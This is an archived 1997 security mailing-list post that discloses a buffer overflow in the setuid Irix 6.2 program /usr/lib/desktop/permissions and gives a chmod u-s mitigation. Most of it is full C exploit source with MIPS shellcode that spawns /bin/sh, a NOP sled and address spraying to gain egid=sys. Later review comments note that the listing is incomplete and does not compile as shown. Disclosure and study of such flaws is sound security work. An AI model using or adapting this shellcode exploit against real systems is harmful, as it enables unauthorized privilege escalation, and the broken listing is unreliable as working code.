
another irix buffer overflow...

From: hedley () CS BRIS AC UK (David Hedley)
Date: Mon, 26 May 1997 23:06:10 +0100

While we're on the subject, here's another buffer overflow for Irix 6.2.
This time it's in /usr/lib/desktop/permissions. Although it's suid root,
this exploit will only give you egid=sys. There may well be exploits
which get root from it, so you'd be as well to
chmod u-s /usr/lib/desktop/permissions to be on the safe side.

As this exploit hits $gp, it won't work on Irix 5.3.

Irix 6.3 isn't vulnerable as SGI appears not to ship it with the program
in question (although there is still a manual page for it).

You'll need to give the target machine access to your display for this
exploit to work.


 David Hedley (hedley () cs bris ac uk)
 finger hedley () cs bris ac uk for PGP key
 Computer Graphics Group | University of Bristol | UK

------------------------- cut here --------------------------------------

/* /usr/lib/desktop/permissions exploit by DCRH 26/5/97
 * This gives you egid = sys
 * Tested on: R8000 Power Challenge (Irix64 6.2)
 * Exploit doesn't work on Irix 5.x due to stack position
 * compile as: cc -n32 perm.c
 *
 * NOTE(review): historical advisory listing for a platform that is long out
 * of support. The mitigation the advisory itself gives is to drop the setuid
 * bit on the target binary (chmod u-s). As archived the listing is
 * incomplete: the array initializers and main() have lost their closing
 * braces and the buffer `buf` written below is never declared, so it does
 * not compile as shown.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Layout constants for the argument built in main(): a run of NUM_ADDRESSES
 * bytes of return-address guesses, BUF_LENGTH bytes of NOP sled plus payload,
 * then EXTRA bytes of halfword-swapped $gp-relative values (see GP_OFFSET and
 * the advisory's remark that the exploit "hits $gp").  OFFSET is the guessed
 * distance from this process's stack pointer to the target's buffer;
 * argv[1] adjusts it in 4-byte steps.  Exact meanings are inferred from the
 * loops below and the advisory text - TODO confirm against the original. */
#define NUM_ADDRESSES   400
#define BUF_LENGTH      700
#define EXTRA           500
#define OFFSET          0x200
#define GP_OFFSET       31612
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

/* Plain 32-bit unsigned under -n32; this macro shadows any u_long typedef
 * the system headers above may have provided. */
#define u_long unsigned

/* Three MIPS instructions, executed through the function-pointer cast in
 * main(), that return the caller's current stack pointer in $v0. */
u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */

/* Payload: MIPS instructions followed by the bytes of "/bin/sh" (see the
 * per-word comments).  main() sizes it with strlen(), so it must contain no
 * zero byte before its end; that strlen() also relies on a zero byte
 * following the last word, which the archived listing does not show. */
u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */


/* Builds the oversized argument in `buf` (undeclared in this listing) and
 * execs the target with it.  argv[1], if given, is an integer adjustment to
 * the guessed buffer address, in words.  `void main` is non-standard; the
 * error branches below print a message but, as archived, do not exit. */
void main(int argc, char **argv)
    char *env[] = {NULL};
    u_long targ_addr, stack, tmp;
    u_long *long_p;
    /* Length of the payload string, NUL included. */
    int i, code_length = strlen((char *)irix_shellcode)+1;
    /* Treat the data array as code; fine on this target, UB in general. */
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    /* A stack pointer with the top bit set indicates the wrong ABI. */
    if (stack & 0x80000000) {
        printf("Recompile with the '-n32' option\n");

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    /* atoi() gives no error indication; a non-numeric argv[1] yields 0. */
    if (argc > 1)
        targ_addr += atoi(argv[1]) * 4;

    if (targ_addr + GP_OFFSET > 0x80000000) {
        printf("Sorry - this exploit for Irix 6.x only\n");

    /* Word-aligned address somewhere in the middle of the NOP run. */
    tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;

    /* Bump the address until none of its four bytes is zero: `buf` is passed
     * as a C-string argument, so a zero byte would terminate it early. */
    while ((tmp & 0xff000000) == 0 ||
           (tmp & 0x00ff0000) == 0 ||
           (tmp & 0x0000ff00) == 0 ||
           (tmp & 0x000000ff) == 0)
        tmp += 4;

    /* Section 1: repeated address guesses. */
    for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
        *long_p++ = tmp;

    /* Section 2: NOP sled sized so the payload ends at BUF_LENGTH. */
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    /* Section 3: the payload itself, copied word by word. */
    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;

    /* Section 4: the $gp-relative value with its halfwords swapped;
     * presumably to match how the target loads it - confirm. */
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (tmp << 16) | (tmp >> 16);

    /* Terminate the argument string. */
    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    /* Needs DISPLAY to point at a server the target may use (see advisory).
     * NOTE(review): the argv terminator is a bare 0; a variadic call should
     * pass (char *)NULL on ABIs where int and pointer sizes differ. */
    execle("/usr/lib/desktop/permissions", "permissions",
           "-display", getenv("DISPLAY"), "/bin/ls", buf, 0, env);
    /* Only reached if the exec itself fails. */
    perror("execl failed");
